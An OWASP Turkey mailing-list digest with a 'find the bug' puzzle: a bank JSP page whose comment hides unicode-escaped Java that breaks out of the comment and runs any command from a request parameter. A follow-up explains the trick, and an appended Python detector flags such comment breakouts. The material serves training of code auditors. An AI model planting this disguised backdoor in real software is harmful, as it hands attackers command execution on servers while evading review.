[Owasp-turkey] Owasp-turkey Digest, Vol 31, Issue 22

Oğuzhan YILMAZ aspsrc at gmail.com
Tue Oct 20 13:03:09 EDT 2009


Something that broadens one's horizons. Thanks.

Oğuzhan YILMAZ


On 20 October 2009 at 19:00, <owasp-turkey-request at lists.owasp.org> wrote:

> Message: 1
> Date: Tue, 20 Oct 2009 18:38:07 +0300
> From: Bedirhan Urgun <bedirhanurgun at gmail.com>
> Subject: Re: [Owasp-turkey] Arızayı Bul #4
> To: OWASP-Türkiye <owasp-turkey at lists.owasp.org>
> Message-ID:
>        <297cff690910200838q3a62d820oa1b91f630755ef86 at mail.gmail.com>
> Content-Type: text/plain; charset="utf-8"
>
> I said this one would draw more interest than the others...  :)) it didn't
>
> The answer: a backdoor written in the spirit of "everyone trusts the
> developers, but they can wreak havoc on production". Java allows code to be
> written with unicode characters in a specific format (\uxxxx). In other
> words, identifiers, keywords, operators and so on don't all have to be
> ASCII. (C# does have such a restriction; for keywords and operators, for
> instance, only ASCII characters can be used.) In short, if you take the part
> written in unicode format inside the JSP I gave, put a ' character at its
> beginning and end, and paste it into the INPUT field of the
>
> http://www.webguvenligi.org/ipacker/ipacker.html
>
> application and press the EVAL TO OUTPUT button, you can see what kind of
> backdoor the developer actually wrote. The resulting piece closes the
> multiline comment, writes the actual backdoor code, and then reopens the
> multiline comment (so that we don't get a "syntax error", just like in
> SQLi or LDAPi).
>
> This makes life harder for an auditor inspecting with the naked eye or
> trying to audit with regexes.
>
> bedirhan
>
> On 18 October 2009 at 21:05, Bedirhan Urgun <bedirhanurgun at gmail.com>
> wrote:
>
> >
> > This time there's a fun bug :) It requires looking at the matter from a
> > different perspective. A JSP page...
> >
> > bedirhan
> >
> > Arızayı Bul #4 (Find the Bug #4)
> > --------------------
> >
> > <%@page contentType="text/html" pageEncoding="UTF-8"%>
> > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> >    "http://www.w3.org/TR/html4/loose.dtd">
> > <html>
> >     <head>
> >         <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
> >         <title>BankHorizon Welcome Page</title>
> >         <link rel="stylesheet" type="text/css" href="style.css" />
> >     </head>
> >     <body>
> >         <% /* Include the header page */ %>
> >         <jsp:include page="header.jsp" />
> >         <% /* Include the menu page */ %>
> >         <jsp:include page="menu.jsp" />
> >         <% /* Include the footer menu left page */ %>
> >         <jsp:include page="footer_menu_left.jsp" />
> >         <h2></h2>
> >         <jsp:include page="data_validation.jsp" />
> >         <%
> >             /************************************COMMENT BEGIN**************************************
> >            This is unicode that will be used for data validation
> >
> >
> \u002a\u002f\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u003d\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0061\u0072\u006b\u0061\u006b\u0061\u0070\u0069\u0022\u0029\u003b\u0020\u0069\u0066\u0020\u0028\u0020\u0073\u0021\u003d\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0073\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0020\u0022\u0061\u0063\u0069\u006b\u0022\u0020\u0029\u0020\u0029\u0020\u007b\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0020\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0020\u0022\u006b\u006f\u006d\u0075\u0074\u0022\u0020\u0029\u0020\u0029\u003b\u0020\u007d\u002f\u002a
> >             *************************************COMMENT END***********************************/
> >             String lang = request.getParameter("language");
> >             // use the unicode above to validate the data
> >             validateUnicode(lang);
> >         %>
> >         <br/>
> >         <% /* Include the footer bottom page */ %>
> >         <jsp:include page="footer_bottom.jsp" />
> >     </body>
> > </html>
> >
>
>
>
> --
> Bedirhan Urgun
> http://www.webguvenligi.org
> http://www.owasp.org/index.php/Turkey
>
> To subscribe to the Turkish Web Application Security mailing list:
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
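As an added, defender-side example (not part of the thread or of webguvenligi.org's tooling), the following Python checker mimics the compiler's \uXXXX translation step that Bedirhan describes and flags block comments whose escapes decode to a `*/` terminator, which is exactly how the JSP above smuggles live code into an auditor-friendly comment. The sample scriptlet and its harmless payload are constructed for the demonstration.

```python
import re

# Java translates \uXXXX escapes (one or more 'u') before tokenising, but only
# when the backslash is not itself escaped, i.e. it is preceded by an even
# number of backslashes. Group 1 keeps those pairs, group 2 is the hex value.
UNICODE_ESCAPE = re.compile(r'(?<!\\)((?:\\\\)*)\\u+([0-9A-Fa-f]{4})')
BLOCK_COMMENT = re.compile(r'/\*.*?\*/', re.S)

def decode_java_unicode(src: str) -> str:
    """Apply the compiler's unicode-escape translation step to raw source."""
    return UNICODE_ESCAPE.sub(
        lambda m: m.group(1) + chr(int(m.group(2), 16)), src)

def find_comment_breakouts(src: str):
    """Return (line, hidden_code) for each block comment whose escapes decode
    to '*/': the comment really ends early and the rest is live code.
    Heuristic only: a '/*' inside a string literal is treated as a comment."""
    findings = []
    for m in BLOCK_COMMENT.finditer(src):
        raw = m.group(0)
        if not UNICODE_ESCAPE.search(raw):
            continue                                # nothing to decode
        inner = decode_java_unicode(raw)[2:-2]      # strip visible /* and */
        if '*/' not in inner:
            continue                                # harmless escapes (accents etc.)
        live = inner.split('*/', 1)[1]              # after the decoded terminator
        hidden = live.split('/*', 1)[0].strip()     # up to the re-opened comment
        line = src.count('\n', 0, m.start()) + 1
        findings.append((line, hidden))
    return findings

# Constructed sample scriptlet (not the thread's payload): the escape run decodes
# to '*/ int hidden = 1; /*', which closes the comment and leaves live code.
_PAYLOAD = ''.join(f'\\u{ord(c):04x}' for c in '*/ int hidden = 1; /*')
SAMPLE_JSP = f"""<% /* Include the header page */ %>
<%
    /* T\\u00fcrk\\u00e7e comment: escapes that decode to plain letters */
    /* COMMENT BEGIN
       {_PAYLOAD}
       COMMENT END */
    String lang = request.getParameter("language");
%>"""

if __name__ == '__main__':
    for line, code in find_comment_breakouts(SAMPLE_JSP):
        print(f'line {line}: comment closes early, hidden code: {code}')
```

Running the checker over the real JSP above reports the COMMENT BEGIN block the same way, while the accented comment in the sample is correctly left alone.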